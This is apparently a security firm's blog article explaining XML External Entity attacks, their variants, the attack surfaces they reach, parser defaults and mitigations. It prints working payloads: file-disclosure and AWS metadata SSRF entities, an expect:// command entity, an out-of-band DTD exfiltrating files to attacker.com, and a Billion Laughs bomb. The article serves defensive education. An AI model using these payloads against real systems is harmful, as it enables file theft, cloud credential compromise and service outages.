From the Hacker's Desk

XML External Entity Attack: The Parser Vulnerability That Reads Your Files, Scans Your Network, and Nobody Patched

> vulnerability: CWE-611 —— owasp_classification: A05:2021 Security Misconfiguration —— impact: file disclosure / SSRF / RCE / DoS —— root_cause: the XML specification itself<span class="cursor-blink">_</span>_

Hedgehog Security 16 October 2024 23 min read
xxe xml-external-entity owasp-top-10 web-security ssrf file-disclosure injection application-security penetration-testing mitre-attack

The XML specification has a feature — and that feature is the vulnerability.

XML External Entity injection — XXE — is not a bug in any particular software. It is a feature of the XML 1.0 specification itself, exploited against applications that parse XML input without disabling that feature. The specification defines a mechanism called 'external entities' that allows an XML document to reference and include content from external sources — local files, remote URLs, internal network resources. When an XML parser processes a document containing an external entity declaration, it dutifully resolves the reference and includes the content, exactly as the specification instructs.

The problem is that in a web application context, the XML document is supplied by the user — an untrusted source — and the parser executes on the server with the server's permissions and network access. An attacker who can control the XML input can instruct the parser to read any file the application has access to, make HTTP requests to internal systems the server can reach, or consume system resources until the application crashes. The parser is not misbehaving. It is doing exactly what the XML specification tells it to do. The vulnerability exists because the feature should never have been enabled for untrusted input.

XXE first appeared in the OWASP Top 10 in 2017 as a dedicated category (A4: XML External Entities). In the 2021 update, it was consolidated into A05: Security Misconfiguration — which is accurate, because XXE is fundamentally a configuration issue. Every major XML parser in every major programming language ships with external entity processing enabled by default, or has historically done so. Disabling it requires explicit configuration. Most developers never do.


How XML entities work — and how attackers abuse them.

To understand XXE, you need to understand three components of the XML specification: Document Type Definitions (DTDs), entities, and external entity declarations. A DTD defines the structure and permitted elements of an XML document. Within a DTD, you can declare entities — named storage units that act as variables within the document. An internal entity defines its content inline. An external entity defines its content by referencing an external resource via a URI.

XML Entity Types — From Harmless to Dangerous
── Internal Entity (harmless — content defined inline) ────────
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY company "Hedgehog Security">
]>
<note>
<to>Client</to>
<from>&company;</from> <!-- resolves to 'Hedgehog Security' -->
</note>

── External Entity — File Disclosure (dangerous) ─────────────
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
<!-- Parser reads /etc/passwd and inserts content into <foo> -->

── External Entity — SSRF (dangerous) ────────────────────────
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<foo>&xxe;</foo>
<!-- Parser makes HTTP request to AWS metadata service -->
<!-- Returns IAM credentials, instance identity, and more -->

── External Entity — RCE via PHP expect (critical) ───────────
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
<foo>&xxe;</foo>
<!-- If PHP 'expect' module is loaded, executes 'id' command -->
<!-- Returns: uid=33(www-data) gid=33(www-data) groups=33 -->

The SYSTEM keyword is the critical instruction. It tells the XML parser to resolve the entity's content from an external URI. The URI can use any scheme the parser supports — file:// for local files, http:// or https:// for remote resources, and in some implementations, specialised schemes like expect:// (PHP), jar:// (Java), or gopher:// for protocol-level interaction. The attacker controls the URI. The parser resolves it with the server's permissions. That single mechanism enables every XXE attack variant.


Five things an attacker can do with a vulnerable XML parser.

1. Arbitrary File Disclosure
The most common XXE exploitation. The attacker defines an external entity with a file:// URI pointing to a sensitive file — /etc/passwd, /etc/shadow, application configuration files containing database credentials, private keys, or any file readable by the application's service account. If the XML parser's output is reflected in the application's response, the file contents are returned directly to the attacker. This is 'in-band' XXE — the exfiltration path is the same as the injection path. On Windows, targets include C:\Windows\win.ini, web.config files, SAM database paths, and IIS configuration.
2. Server-Side Request Forgery (SSRF)
By defining an external entity with an http:// URI, the attacker can force the server to make HTTP requests to arbitrary destinations — including internal services not accessible from the internet. Cloud metadata services (169.254.169.254 on AWS, equivalent endpoints on Azure and GCP), internal APIs, administrative interfaces, and other backend systems all become reachable. In cloud environments, accessing the metadata service can yield IAM credentials, instance roles, and secrets that enable full cloud account compromise. XXE-to-SSRF is one of the most impactful attack chains in cloud-hosted applications.
3. Internal Network Port Scanning
By defining external entities pointing to internal IP addresses and ports, the attacker can use the XML parser as a port scanner. The parser's response — whether it returns content, times out, or generates an error — reveals whether the targeted port is open, closed, or filtered. This allows an attacker to map internal network topology, discover services, and identify targets for further exploitation — all from outside the network, using the vulnerable application as a pivot point.
4. Denial of Service (Billion Laughs)
The 'Billion Laughs' attack — also called an XML bomb — exploits entity expansion rather than external entity resolution. The attacker defines a chain of nested entities, each referencing the previous one multiple times. When the parser expands the final entity, the nested references multiply exponentially — a few hundred bytes of XML expand into gigabytes of memory, crashing the parser and potentially the entire application server. This does not require external entity support — only internal entity expansion — making it effective even against some parsers that have disabled external entities but not DTD processing entirely.
5. Remote Code Execution (Rare but Devastating)
In specific configurations, XXE can achieve remote code execution. PHP applications with the 'expect' module loaded can execute system commands via the expect:// URI scheme. Java applications with certain XML parser configurations can trigger code execution via crafted jar:// URIs or through XSLT processing. While RCE via XXE is less common than file disclosure or SSRF, it represents the maximum impact scenario and transforms a parser misconfiguration into complete server compromise.

When the parser does not show you what it read.

In many applications, the XML parser processes the input but does not reflect entity content in the response. The attacker sends a malicious document, the parser resolves the external entity, but the file contents are consumed internally without being returned. This is 'blind XXE' — the vulnerability exists, but the standard in-band exploitation technique does not work because there is no visible output channel.

Blind XXE is not a lesser vulnerability. It simply requires different exfiltration techniques. Two primary methods exist.

Blind XXE — Out-of-Band (OOB) Data Exfiltration
── Step 1: Attacker hosts a malicious DTD on their server ────
── File: https://attacker.com/evil.dtd ────────────────────────

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM
'https://attacker.com/steal?data=%file;'>">
%eval;
%exfil;

── Step 2: Attacker sends payload to vulnerable application ──

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "https://attacker.com/evil.dtd">
%dtd;
]>
<foo>test</foo>

── What happens ───────────────────────────────────────────────
1. Parser loads external DTD from attacker.com
2. DTD reads /etc/hostname into %file parameter entity
3. DTD constructs URL with file contents as query parameter
4. Parser makes HTTP request to attacker.com/steal?data=...
5. Attacker's web server logs contain the file contents

── The application returns nothing. The attacker gets everything.

The second blind XXE technique uses error-based exfiltration: the attacker crafts an entity that triggers a parser error containing the file contents within the error message. If the application displays or logs detailed error messages, the attacker can read the file contents from the error output. This technique works even when outbound HTTP connections from the server are blocked, as long as error messages are visible.

DNS-based exfiltration provides a third channel. Even when HTTP outbound is restricted, DNS queries are rarely blocked. The attacker constructs an entity that makes the parser resolve a hostname containing the exfiltrated data as a subdomain — for example, SENSITIVE-DATA.attacker.com. The attacker's authoritative DNS server logs the query, revealing the data. This is slower (limited by DNS label length) but extremely difficult to block.


A few bytes of XML that consume gigabytes of memory.

Billion Laughs — XML Entity Expansion Bomb
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

── Expansion ──────────────────────────────────────────────────
lol9 contains 10 × lol8
lol8 contains 10 × lol7
...and so on, 9 levels deep

Total 'lol' strings: 10^9 = 1,000,000,000 (one billion)
Payload size: ~1 KB
Expanded size: ~3 GB of memory

Result: application crash, service denial, resource exhaustion

The Billion Laughs attack is elegant in its simplicity. A document smaller than 1 KB causes the parser to allocate approximately 3 GB of memory. No external entity resolution is required — only internal entity expansion. This means that parsers configured to block external entities but that still permit DTD processing remain vulnerable. The only complete defence is to disable DTD processing entirely, or to implement entity expansion limits (which most modern parsers now support, but which must be explicitly configured).


The attack surfaces that most organisations overlook.

The obvious XXE attack surface is any endpoint that accepts XML input — SOAP web services, XML-RPC endpoints, XML-based API request bodies, and file upload functionality that processes XML formats. But the less obvious attack surfaces are where we most frequently find exploitable XXE during engagements.

Office Document Uploads (DOCX, XLSX, PPTX)
Microsoft Office documents are ZIP archives containing XML files. When an application processes uploaded Office documents — parsing content, extracting metadata, converting formats — it typically uses an XML parser on the internal XML files. If that parser has external entities enabled, a crafted DOCX file with a malicious entity in its internal XML can trigger XXE on the server. We have exploited this in document management systems, HR platforms that parse CVs, and financial applications that process uploaded spreadsheets.
SVG Image Uploads
SVG (Scalable Vector Graphics) is an XML-based image format. Applications that accept image uploads and process SVG files are parsing XML — and if the parser permits external entities, a crafted SVG triggers XXE. This is particularly common in content management systems, social platforms, and any application that generates thumbnails or previews of uploaded images.
RSS and Atom Feed Parsers
Applications that consume RSS or Atom feeds — news aggregators, monitoring dashboards, content syndication platforms — are parsing XML from external sources. If the feed parser does not disable external entities, an attacker who controls a feed source (or can poison a feed via injection) can exploit XXE.
SOAP Web Services
SOAP APIs exchange XML by definition. Legacy SOAP services are among the most common XXE targets. Many were built before XXE was widely understood and have never had their parser configurations reviewed. Enterprise environments running SOAP-based integrations with healthcare, financial, or government systems frequently harbour XXE vulnerabilities that have persisted for years.
SAML Authentication Flows
Security Assertion Markup Language (SAML) — used for single sign-on across enterprise applications — is XML-based. SAML assertions, requests, and responses are all XML documents. If the SAML parser is vulnerable to XXE, an attacker can exploit the authentication flow itself to read files from the identity provider or service provider. This is particularly impactful because SAML endpoints are authentication-adjacent and often highly trusted.
Content-Type Manipulation
Some API endpoints that nominally accept JSON will also accept XML if the Content-Type header is changed to application/xml. The backend framework automatically selects the appropriate parser based on the content type. If the XML parser is vulnerable, an attacker can exploit an endpoint that was never intended to accept XML input — simply by changing the Content-Type header. We test this on every API engagement.

Parser defaults across languages — most are vulnerable out of the box.

Language / Parser External Entities Default DTD Processing Default Key Mitigation
Java — DocumentBuilderFactory, SAXParser, DOM4J, JAXB Enabled by default. Java is historically the most XXE-prone language. All major Java XML parsers process external entities unless explicitly disabled. Enabled by default. Set feature 'disallow-doctype-decl' to true. Disable external general and parameter entities. Set XMLConstants.FEATURE_SECURE_PROCESSING. Each parser requires different API calls — consult the OWASP cheat sheet for your specific parser.
PHP — libxml (SimpleXML, DOMDocument, XMLReader) Enabled by default in older versions. Since PHP 8.0, libxml 2.9+ disables external entity loading by default via LIBXML_NOENT. Older PHP versions are vulnerable. Enabled by default. Call libxml_disable_entity_loader(true) on PHP < 8.0. Use LIBXML_NONET flag to prevent network access. Verify libxml version — anything below 2.9 is vulnerable by default.
Python — xml.etree, xml.dom, xml.sax, lxml Varies by parser. xml.etree.ElementTree does not resolve external entities by default. lxml resolves them by default. xml.sax varies by configuration. Varies. Use defusedxml library — a drop-in replacement that disables all dangerous XML features by default. For lxml, set resolve_entities=False and no_network=True. The Python documentation explicitly warns about XML vulnerabilities.
.NET — XmlDocument, XmlReader, XmlTextReader, XPathDocument Changed across versions. .NET Framework 4.5.2+ disabled DTD processing by default in most parsers. Earlier versions are vulnerable. XmlTextReader in .NET Framework < 4.5.2 resolves external entities by default. Depends on version. Set DtdProcessing = DtdProcessing.Prohibit for all parsers. Set XmlResolver to null. Ensure XmlReaderSettings prohibits DTD. Verify your .NET Framework version — anything below 4.5.2 requires explicit hardening.
Ruby — REXML, Nokogiri REXML expands entities by default. Nokogiri (which uses libxml2) disables network access by default but does expand local entities. Enabled. For Nokogiri, use Nokogiri::XML::ParseOptions::NONET. For REXML, the entity expansion limit was introduced in Ruby 2.0.0 but external resolution must be manually controlled.

The pattern is consistent: most XML parsers across most languages are either vulnerable by default or have been vulnerable by default in recent historical versions. Secure configuration requires explicit action by the developer. In the absence of that action — which is the norm in the codebases we review — the application is vulnerable to XXE.


How we find and exploit XXE during engagements.

Our approach to XXE testing during penetration testing engagements follows a systematic methodology designed to identify both obvious and hidden XML parsing surfaces.

Identify XML Parsing Surfaces
We examine every endpoint for XML processing: explicit XML content types in requests, SOAP services, file upload functionality (especially Office documents and SVG), RSS/Atom feed consumption, SAML flows, and any API endpoint that might accept XML alongside JSON. We test Content-Type switching on JSON APIs — sending the same data as XML with application/xml to see if the server processes it.
Test for In-Band XXE
We inject a basic external entity declaration referencing a known file (/etc/hostname on Linux, C:\Windows\win.ini on Windows) and check whether the file contents appear in the response. If they do, we have confirmed in-band XXE and can escalate to reading sensitive files — application configuration, database credentials, private keys, source code.
Test for Blind XXE via OOB
If in-band exfiltration fails (no reflection in response), we deploy out-of-band techniques. We host a malicious DTD on our testing infrastructure and inject a parameter entity that loads it. If the server makes an HTTP request to our server, we have confirmed the parser resolves external entities — even though output is not reflected. We then use the OOB technique to exfiltrate file contents via URL parameters or DNS subdomains.
Test for Entity Expansion DoS
We send a controlled Billion Laughs payload with a reduced expansion factor (enough to detect vulnerability without causing outage) to determine whether the parser has entity expansion limits configured. If the application slows significantly or returns a memory-related error, the DoS vector is confirmed.
Escalate to SSRF
Once external entity resolution is confirmed, we test whether the parser can make HTTP requests to internal addresses — cloud metadata services (169.254.169.254), internal API endpoints, administrative interfaces. In cloud-hosted applications, accessing the metadata service via XXE-to-SSRF frequently yields IAM credentials that allow escalation beyond the application itself into the cloud infrastructure.

What an attacker gains and what your organisation loses.

XXE Variant Attacker Gains CVSS Severity Real-World Consequence
File Disclosure Contents of any file readable by the application — configuration files, credentials, private keys, source code, user data. High (7.5–9.1) Database credentials in config files lead to full database compromise. Private keys enable impersonation. Source code reveals further vulnerabilities. /etc/shadow enables offline password cracking.
SSRF HTTP requests to internal services — cloud metadata, admin panels, databases, APIs not exposed to the internet. High to Critical (7.5–10.0) AWS metadata access yields IAM credentials → full cloud account compromise. Internal admin panel access enables configuration changes. Internal API access enables data manipulation.
Blind XXE (OOB) Same as file disclosure but via out-of-band channel — slower but equally impactful. High (7.5–9.1) Same consequences as in-band file disclosure. Harder to detect because exfiltration occurs via DNS or HTTP to attacker infrastructure, not in the application response.
Denial of Service Application crash, resource exhaustion, service unavailability. High (7.5) Production application outage. 1 KB payload causes 3 GB memory allocation. Repeated attacks can prevent recovery.
Remote Code Execution Full server compromise — the attacker executes arbitrary commands with the application's privileges. Critical (9.8–10.0) Complete control of the server. Data theft, ransomware deployment, pivot to internal network. Rare but devastating — primarily via PHP expect:// or Java-specific vectors.

How to eliminate XXE — the fix is configuration, not code.

The most important thing to understand about XXE mitigation is that it is a configuration problem with a configuration solution. You do not need to rewrite your application. You do not need to implement complex input validation. You need to configure your XML parser to not process the features that enable XXE. The OWASP XXE Prevention Cheat Sheet provides parser-specific instructions for every major language.

Primary Defence: Disable DTDs Entirely
The safest approach is to disable Document Type Definition processing entirely. If the parser will not process DTDs, it cannot process entity declarations — internal or external. This eliminates XXE, Billion Laughs, and all DTD-based attacks in a single configuration change. Most applications do not require DTD processing, and disabling it has no functional impact. This is OWASP's primary recommendation.
Secondary Defence: Disable External Entity Resolution
If DTDs cannot be fully disabled (some legacy applications depend on DTD validation), disable external entity resolution specifically. This prevents file:// and http:// entity resolution while still permitting internal entity declarations. This stops file disclosure and SSRF but does not prevent Billion Laughs (which uses only internal entities). It is a weaker defence than disabling DTDs entirely.
Use Safe-by-Default Libraries
In Python, use defusedxml instead of the standard library XML parsers. In other languages, prefer XML parsers that are secure by default or that provide a safe mode. When selecting an XML parsing library, verify its default behaviour regarding external entities and DTD processing — do not assume it is safe.
Replace XML with JSON Where Possible
If your application does not require XML-specific features (schemas, DTDs, XPath, XSLT), consider migrating to JSON. JSON has no equivalent to external entities and is structurally immune to XXE. This is a longer-term architectural change but eliminates the entire vulnerability class.
Defence in Depth: WAF Rules
Web Application Firewalls can detect and block XML payloads containing DOCTYPE declarations, ENTITY definitions, and SYSTEM keywords. This provides an additional detection layer but should not be relied upon as the primary defence — WAF bypass techniques exist, and the parser configuration fix is both more reliable and more complete.
Audit All XML Parsing Surfaces
Identify every component in your application stack that parses XML — including indirect parsers (Office document processors, SVG renderers, SAML libraries, RSS consumers). Each parser needs independent configuration review. A single overlooked parser in a file upload handler or SAML integration can provide the XXE entry point that the rest of your hardening missed.

How to verify your applications are not vulnerable.

Quick XXE Verification Tests
── Test 1: Basic External Entity (in-band) ───────────────────
Send to any XML-accepting endpoint:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<root>&xxe;</root>

VULNERABLE if: hostname appears in response
SAFE if: error message about DTDs or entities being disabled

── Test 2: OOB Detection (blind) ──────────────────────────────
Send and monitor your Burp Collaborator / interactsh:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "http://YOUR-CALLBACK-ID.oastify.com">
]>
<root>&xxe;</root>

VULNERABLE if: HTTP/DNS callback received
SAFE if: no callback and DTD error in response

── Test 3: Content-Type Switching (hidden surface) ────────────
For JSON APIs, resend the request with:
Content-Type: application/xml
And replace the JSON body with XML containing an entity.

VULNERABLE if: server processes the XML
SAFE if: server rejects non-JSON content types

The bottom line.

XXE is a vulnerability that should not exist in 2026. The root cause is known (XML specification features enabled by default in parsers processing untrusted input). The fix is known (disable DTD processing or external entity resolution). The OWASP cheat sheet provides parser-specific instructions for every major language. And yet we continue to find XXE in production applications — particularly in SOAP services, file upload handlers, Office document processors, and SAML integrations where the XML parsing happens in a library rather than in code the development team wrote.

The reason XXE persists is the same reason most configuration-based vulnerabilities persist: the secure configuration is not the default, and developers reasonably assume that default configurations are safe. They are not. If your application parses XML from any untrusted source — user input, uploaded files, external feeds, SAML assertions, SOAP requests — your XML parser needs explicit configuration to disable the features that enable XXE. One configuration change. Applied to every parser. That is the entire mitigation.

The impact of failing to make that change ranges from embarrassing (reading /etc/passwd during a penetration test) to catastrophic (cloud account compromise via SSRF to the metadata service, or complete server takeover via RCE). The effort to exploit it ranges from trivial (a few lines of XML in Burp Suite) to moderate (blind OOB exfiltration via parameter entities). The effort to prevent it is minimal — a few lines of parser configuration. The cost-benefit calculation is not close.


Is your application vulnerable to XXE?

Our penetration testers systematically identify and exploit XXE vulnerabilities across all XML parsing surfaces — including the hidden ones in file upload handlers, SAML integrations, and APIs that accept XML via Content-Type switching. We test in-band, blind, and OOB variants, and provide specific parser configuration remediation for your technology stack.